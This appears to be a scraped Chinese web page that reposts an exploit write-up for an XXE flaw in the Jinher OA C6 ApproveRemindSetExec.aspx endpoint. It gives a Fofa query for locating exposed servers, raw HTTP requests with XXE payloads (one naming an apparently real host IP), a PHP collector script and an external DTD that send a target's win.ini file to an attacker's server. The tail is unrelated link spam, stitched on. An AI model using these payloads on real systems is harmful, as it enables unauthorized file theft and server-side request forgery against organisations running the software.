当前位置: 首页 > news >正文

下载网站的服务器文件网站开发流程数据库

下载网站的服务器文件,网站开发流程数据库,建筑人才网官网首页,外贸网站优势0x01 产品描述: 金和C6协同管理平台是以"精确管理思想"为灵魂,围绕“企业协同四层次理论”模型,并紧紧抓住现代企业管理的六个核心要素:文化 Culture、 沟通Communication 、 协作Collaboration 、创新 Creation、 控制…

0x01 产品描述:

        金和C6协同管理平台是以"精确管理思想"为灵魂,围绕“企业协同四层次理论”模型,并紧紧抓住现代企业管理的六个核心要素:文化 Culture、 沟通Communication 、 协作Collaboration 、创新 Creation、 控制 Control、中心 Center,而构建了结构化的、灵活集成的、动态响应的、面向企业运营管理的智慧协同应用管理平台。
0x02 漏洞描述:

        金和OA-C6 ApproveRemindSetExec.aspx接口存在XXE漏洞,未经授权的攻击者可利用该漏洞实现任意文件读取或ssrf。
0x03 搜索语句:

Fofa:body="c6/Jhsoft.Web.login"


0x04 漏洞复现:

利用dnslog复现

POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://123.0olbin.dnslog.cn"> %remote;]>

 

服务器快速检测: 

POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1
Host: 61.133.99.56:88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://your-vps:port/test.xml"> %remote;]>

利用dtd获取数据:

整体流程:poc利用个人服务器执行dtd与读取目标服务器的c盘文件内容。

Dtd内容是XXE无回显利用方式,将内容外带到其他地方,将内容通过get.php写入file.txt。

首先在vps上创建以下脚本:

<?php
$data=$_GET['file'];
$myfile = fopen("file.txt", "w+");
fwrite($myfile, $data);
fclose($myfile);
?>

 构造dtd用以读取,dtd里内容如下

<!ENTITY % all "<!ENTITY send SYSTEM 'http://your-vps:port/get.php?file=%file;'>">

构造完成后vps启动服务用于信息监听

请求构造以下数据

POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///C:/Windows/win.ini">
<!ENTITY % remote SYSTEM "http://your-vps:port/xxe.dtd">
%remote;
%all;
]>
<root>&send;</root>

 

 获取win.ini数据

解码后

0x05 修复建议:

官方已修复该漏洞,请用户联系厂商修复漏洞:http://www.jinher.com/

http://www.yayakq.cn/news/6376/

相关文章:

  • 重庆做网站推广的wordpress桌面客户端
  • vs2017做的网站哪个网站可以做照片分享
  • 辽阳做网站的公司触屏网站开发教程
  • 建设网站修改图片百度推广要自己做网站吗
  • logo网站推介wordpress 插件游戏
  • 如何在卖家淘宝网站做产品链接东莞原创设计院官网
  • 牡丹江网站建设网站四网合一
  • 网站栏目 英文网站建设 紧急检查工作
  • discuz网站编码网站模板 数据库
  • 象山建设局网站橱柜设计师培训
  • 手机网站域名解析怎么做网站常用热点hot小图标
  • 网站续费合同书链接缩短生成器
  • 建设wap网站企业网站哪个好
  • 青岛cms建站系统免费引流推广工具
  • 广东中南建设有限公司网站泗阳网站建设
  • 充值网站怎么做的做网站 图片是文本
  • asp网站加速wordpress跳转到老域名
  • 使用cdn的网站h5页面导入 WordPress
  • 网站开发后台结构系统设计
  • 有做网站网站的么wordpress js图片
  • 优秀的网页网站设计wordpress 导航菜单
  • 深圳企业网站定制网站建设哪家合适
  • 云南做网站的公司德国网站的后缀名
  • 网站建设方案书内容管理制度济南百度推广公司
  • 金牛区建设和交通局网站红酒手机网站建设
  • 如何制作学校网站应用市场下载安装app
  • 不用ftp做网站南昌谁做网站设计
  • 做微信公众号还是网站深圳东门眼镜城
  • 网站建设使用什么软件比较好黑龙江省城乡和建设厅网站首页
  • 摄影师作品网站有哪些什么网站能免费